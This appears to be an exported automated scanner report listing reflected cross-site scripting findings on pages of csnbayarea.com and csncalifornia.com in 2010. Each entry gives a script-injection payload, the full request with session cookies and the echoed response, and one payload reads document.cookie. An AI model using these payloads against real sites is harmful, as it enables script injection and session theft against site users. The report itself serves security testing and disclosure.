<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90b9a"><script>alert(1)</script>5f8cf1335bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 35402 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/1090b9a"><script>alert(1)</script>5f8cf1335bb/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed61c"><script>alert(1)</script>1b63bb97bee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 35383 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Gutierrez-Denver-Raiders-matchups-to-wated61c"><script>alert(1)</script>1b63bb97bee/landing_gutierrez.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3d0"><script>alert(1)</script>56354eb4635 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 41042 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:21 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12cd3d0"><script>alert(1)</script>56354eb4635/17/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46335"><script>alert(1)</script>f110c8b6e2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 41042 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/1746335"><script>alert(1)</script>f110c8b6e2c/10/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efabd"><script>alert(1)</script>31a0dd08c37 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 41042 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10efabd"><script>alert(1)</script>31a0dd08c37/Maiocco-Singletary-again-weighs-which-Sm/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c68e"><script>alert(1)</script>0e5f634afe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 41023 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Maiocco-Singletary-again-weighs-which-Sm3c68e"><script>alert(1)</script>0e5f634afe3/landing_maiocco_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2b00"><script>alert(1)</script>b3b513ae740 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40245 Content-Type: text/html Set-Cookie: PHPSESSID=8924002375011fa867e8db486718e42d; path=/ Expires: Sun, 19 Dec 2010 18:12:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:09 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00"><script>alert(1)</script>b3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5969e"><script>alert(1)</script>618d21952d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40245 Content-Type: text/html Set-Cookie: PHPSESSID=ffa30f218c9c484953facc9813c8bbd1; path=/ Expires: Sun, 19 Dec 2010 18:12:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/175969e"><script>alert(1)</script>618d21952d3/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be9c1"><script>alert(1)</script>cc49bcb68a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40245 Content-Type: text/html Set-Cookie: PHPSESSID=5a4f36899cfc183f565f8c3eb2a13d16; path=/ Expires: Sun, 19 Dec 2010 18:12:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10be9c1"><script>alert(1)</script>cc49bcb68a2/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85ab2"><script>alert(1)</script>c66f7de0b0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40245 Content-Type: text/html Set-Cookie: PHPSESSID=940f044b17dfcf494474c7a627998fb0; path=/ Expires: Sun, 19 Dec 2010 18:12:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/17/10/Urban-Renterias-comments-wrong-in-every-85ab2"><script>alert(1)</script>c66f7de0b0d/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ed7d"><script>alert(1)</script>67cb3a41014 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40314 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:25 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C7ed7d"><script>alert(1)</script>67cb3a41014/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e51"><script>alert(1)</script>0d5c9babaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40314 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:27 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae74051e51"><script>alert(1)</script>0d5c9babaf1/17/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c95"><script>alert(1)</script>31f08011031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40314 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:28 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17e5c95"><script>alert(1)</script>31f08011031/10/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 358b2"><script>alert(1)</script>d0de32d96b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40295 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:30 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10358b2"><script>alert(1)</script>d0de32d96b3/Urban-Renterias-comments-wrong-in-every-/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd16"><script>alert(1)</script>95264bab223 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 40314 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:31 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a2b00%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb3b513ae740/17/10/Urban-Renterias-comments-wrong-in-every-4fd16"><script>alert(1)</script>95264bab223/landing_urban_v3.html"> ...[SNIP]...
2.233. http://www.csnbayarea.com/pages/landing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbayarea.com
Path:
/pages/landing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cf79"><script>alert(1)</script>0bab4ba8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/landing?1cf79"><script>alert(1)</script>0bab4ba8ccc=1 HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 51177 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="1cf79"><script>alert(1)</script>0bab4ba8ccc" id = "1cf79"> ...[SNIP]...
2.234. http://www.csnbayarea.com/pages/profiles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbayarea.com
Path:
/pages/profiles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bae73"><script>alert(1)</script>36ec9c80c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/profiles?bae73"><script>alert(1)</script>36ec9c80c16=1 HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 52908 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:24 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="bae73"><script>alert(1)</script>36ec9c80c16" id = "bae73"> ...[SNIP]...
2.235. http://www.csnbayarea.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbayarea.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7398"><script>alert(1)</script>58cec5b7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?f7398"><script>alert(1)</script>58cec5b7caa=1 HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 76152 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="f7398"><script>alert(1)</script>58cec5b7caa" id = "f7398"> ...[SNIP]...
2.236. http://www.csncalifornia.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csncalifornia.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b5a"><script>alert(1)</script>20777afd731 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
